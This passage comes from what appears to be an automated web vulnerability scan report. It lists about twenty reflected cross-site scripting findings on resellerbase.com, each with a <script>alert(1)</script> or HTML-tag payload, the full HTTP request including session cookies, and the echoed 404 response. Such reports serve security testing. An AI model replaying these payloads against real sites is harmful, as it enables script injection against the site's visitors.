Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/14/themes/search.php?keyword=search...9fb89<a>46c98aa203&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1202. http://www.resellerbase.com/detail/14/themes/search.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/14/themes/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload e5dc3<script>alert(1)</script>e9833f44663 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/14/themes/search.php?keyword=search...&Submit3=Search&opt=2&e5dc3<script>alert(1)</script>e9833f44663=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/14/themes/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:08:12 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/14/themes/search.php?keyword=search...&Submit3=Search&opt=2&e5dc3<script>alert(1)</script>e9833f44663=1 was not found on this server.</p>
...[SNIP]...

2.1203. http://www.resellerbase.com/detail/14/themes/search.php [opt parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/14/themes/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload 93110<a>38040c1cffe was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/14/themes/search.php?keyword=search...&Submit3=Search&opt=293110<a>38040c1cffe HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/14/themes/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:07:10 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/14/themes/search.php?keyword=search...&Submit3=Search&opt=293110<a>38040c1cffe was not found on this server.</p>
...[SNIP]...

2.1204. http://www.resellerbase.com/detail/15/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/15/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 848cb<script>alert(1)</script>2a943dc5906 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail848cb<script>alert(1)</script>2a943dc5906/15/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:20:10 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail848cb<script>alert(1)</script>2a943dc5906/15/ was not found on this server.</p>
...[SNIP]...

2.1205. http://www.resellerbase.com/detail/15/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/15/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 4287e<script>alert(1)</script>24ec4078911 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/154287e<script>alert(1)</script>24ec4078911/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:20:25 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/154287e<script>alert(1)</script>24ec4078911/ was not found on this server.</p>
...[SNIP]...

2.1206. http://www.resellerbase.com/detail/15/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/15/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 86922<script>alert(1)</script>9e0437d7a30 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/15/?86922<script>alert(1)</script>9e0437d7a30=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:19:52 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/15/?86922<script>alert(1)</script>9e0437d7a30=1 was not found on this server.</p>
...[SNIP]...

2.1207. http://www.resellerbase.com/detail/15/iwebtrack-com.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/15/iwebtrack-com.html

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload a8a10<script>alert(1)</script>8f6b4773c51 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detaila8a10<script>alert(1)</script>8f6b4773c51/15/iwebtrack-com.html HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 21:26:38 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detaila8a10<script>alert(1)</script>8f6b4773c51/15/iwebtrack-com.html was not found on this server.</p>
...[SNIP]...

2.1208. http://www.resellerbase.com/detail/15/iwebtrack-com.html [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/15/iwebtrack-com.html

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 14abb<a>3159163c5e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/1514abb<a>3159163c5e/iwebtrack-com.html HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 21:26:56 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/1514abb<a>3159163c5e/iwebtrack-com.html was not found on this server.</p>
...[SNIP]...

2.1209. http://www.resellerbase.com/detail/15/iwebtrack-com.html [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/15/iwebtrack-com.html

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 12ca7<script>alert(1)</script>0aa277f541a was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/15/12ca7<script>alert(1)</script>0aa277f541a HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 21:27:56 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/15/12ca7<script>alert(1)</script>0aa277f541a was not found on this server.</p>
...[SNIP]...

2.1210. http://www.resellerbase.com/detail/15/rating.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/15/rating.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 67df2<script>alert(1)</script>0a4b32dcaab was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail67df2<script>alert(1)</script>0a4b32dcaab/15/rating.php HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:38:14 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail67df2<script>alert(1)</script>0a4b32dcaab/15/rating.php was not found on this server.</p>
...[SNIP]...

2.1211. http://www.resellerbase.com/detail/15/rating.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/15/rating.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 9dfa1<script>alert(1)</script>d6bd8ca0f5233ce05 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /detail9dfa1<script>alert(1)</script>d6bd8ca0f5233ce05/15/rating.php?id=15&rating=5 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/15/iwebtrack-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:21:57 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail9dfa1<script>alert(1)</script>d6bd8ca0f5233ce05/15/rating.php?id=15&rating=5 was not found on this server.</p>
...[SNIP]...

2.1212. http://www.resellerbase.com/detail/15/rating.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/15/rating.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 48da6<script>alert(1)</script>6b71694c4bdf5910b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /detail/1548da6<script>alert(1)</script>6b71694c4bdf5910b/rating.php?id=15&rating=5 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/15/iwebtrack-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:22:14 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/1548da6<script>alert(1)</script>6b71694c4bdf5910b/rating.php?id=15&rating=5 was not found on this server.</p>
...[SNIP]...

2.1213. http://www.resellerbase.com/detail/15/rating.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/15/rating.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 7de78<script>alert(1)</script>a47a16896ec was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/157de78<script>alert(1)</script>a47a16896ec/rating.php HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:38:25 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/157de78<script>alert(1)</script>a47a16896ec/rating.php was not found on this server.</p>
...[SNIP]...

2.1214. http://www.resellerbase.com/detail/15/rating.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/15/rating.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 7bdc3<script>alert(1)</script>73c80d205428aceed was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /detail/15/rating.php7bdc3<script>alert(1)</script>73c80d205428aceed?id=15&rating=5 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/15/iwebtrack-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:22:31 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/15/rating.php7bdc3<script>alert(1)</script>73c80d205428aceed?id=15&rating=5 was not found on this server.</p>
...[SNIP]...

2.1215. http://www.resellerbase.com/detail/15/rating.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/15/rating.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload d60a8<script>alert(1)</script>aa50d640fb8 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/15/rating.phpd60a8<script>alert(1)</script>aa50d640fb8 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:38:37 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/15/rating.phpd60a8<script>alert(1)</script>aa50d640fb8 was not found on this server.</p>
...[SNIP]...

2.1216. http://www.resellerbase.com/detail/15/rating.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/15/rating.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload b1c20<script>alert(1)</script>c2da172febf243880 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /detail/15/rating.php/b1c20<script>alert(1)</script>c2da172febf243880?id=15&rating=5 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/15/iwebtrack-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:21:20 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/15/rating.php/b1c20<script>alert(1)</script>c2da172febf243880?id=15&rating=5 was not found on this server.</p>
...[SNIP]...

2.1217. http://www.resellerbase.com/detail/15/rating.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/15/rating.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 15806<script>alert(1)</script>edb716f7fc1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/15/rating.php?15806<script>alert(1)</script>edb716f7fc1=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:37:50 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/15/rating.php?15806<script>alert(1)</script>edb716f7fc1=1 was not found on this server.</p>
...[SNIP]...

2.1218. http://www.resellerbase.com/detail/15/search.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/15/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 7626d<script>alert(1)</script>03b432bb6e5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail7626d<script>alert(1)</script>03b432bb6e5/15/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/15/iwebtrack-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:21:55 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail7626d<script>alert(1)</script>03b432bb6e5/15/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1219. http://www.resellerbase.com/detail/15/search.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/15/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload a351b<script>alert(1)</script>096e13671 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/15a351b<script>alert(1)</script>096e13671/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/15/iwebtrack-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:22:11 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/15a351b<script>alert(1)</script>096e13671/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1220. http://www.resellerbase.com/detail/15/search.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/15/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 53b00<script>alert(1)</script>0e0289ec851 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/15/search.php53b00<script>alert(1)</script>0e0289ec851?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/15/iwebtrack-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:22:26 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/15/search.php53b00<script>alert(1)</script>0e0289ec851?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1221. http://www.resellerbase.com/detail/15/search.php [Submit3 parameter] previous next

Summary

Severity:	High
Confidence:	Firm
